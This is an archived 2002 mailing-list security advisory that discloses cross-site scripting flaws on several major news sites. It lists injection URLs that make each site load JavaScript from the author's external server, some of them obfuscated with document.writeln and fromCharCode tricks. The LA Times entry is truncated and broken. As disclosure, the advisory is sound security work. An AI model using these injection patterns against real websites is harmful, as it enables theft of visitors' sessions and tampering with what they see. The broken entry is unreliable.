Next message: Jeremiah J. Jacks: "Cross Site Scripting Vulnerabilities on Major Websites"
Point Blank Security Notice
Friday, March 08, 2002
Title: Subversion of Information Vulnerabilities on Major News Sites
Advisory: PBS0302002
Author: Jeremiah Jacks, Point Blank Security
Summary: http://www.cert.org/advisories/CA-2000-02.html
Disclaimer:
This information is provided "AS IS". Point Blank Security and the
author of this document disclaim all warranties, express and implied,
with regard to this information. This information is provided only for
legitimate security analysis purposes. Point Blank Security and the
author does not condone the unauthorized access of systems, and
specifically prohibits the use or reproduction of this information
for such purposes. In no event shall Point Blank Security or the author
be liable for any damages whatsoever arising out of or in connection
with the use or dissemination of this information. Any use of this
information is at the user's own risk.
Exploitation:
LA Times
01)
http://latimes.com/search/lat_all.jsp?Query=
urity.com/css/latimes.js></script>
Credit: Jeremiah Jacks
NY Times
01)
http://www.nytimes.com/corrections.html?pagewanted="><script>document.writel
n('<script');document.writeln('src=http://pointblanksecurity.com/css/nytimes
.js><\/script>');</script><a+href="
Credit: Jeremiah Jacks
Newsbytes
01)
http://www.newsbytes.com/cgi-bin/udt/mlm.user.register?client.id=newsbytes&e
mail.address="><script>function+Chr(code){return+String.fromCharCode(code);}
document.writeln('<script');document.write('src');document.write(Chr(61));do
cument.write('http://pointblanksecurity.com/css/newsbytes.js><\/script>');</
script><a
Credit: Jeremiah Jacks
The Washington Post
01)
http://www.washingtonpost.com/ac3/ContentServer?pagename=world/worldsearch&C
OUNTRY=<script+src=http://pointblanksecurity.com/css/washpost.js></script>
Credit: Jeremiah Jacks
More Examples At: http://www.pointblanksecurity.com/css/
This archive was generated by hypermail 2b30
: Fri Mar 08 2002 - 11:16:09 PST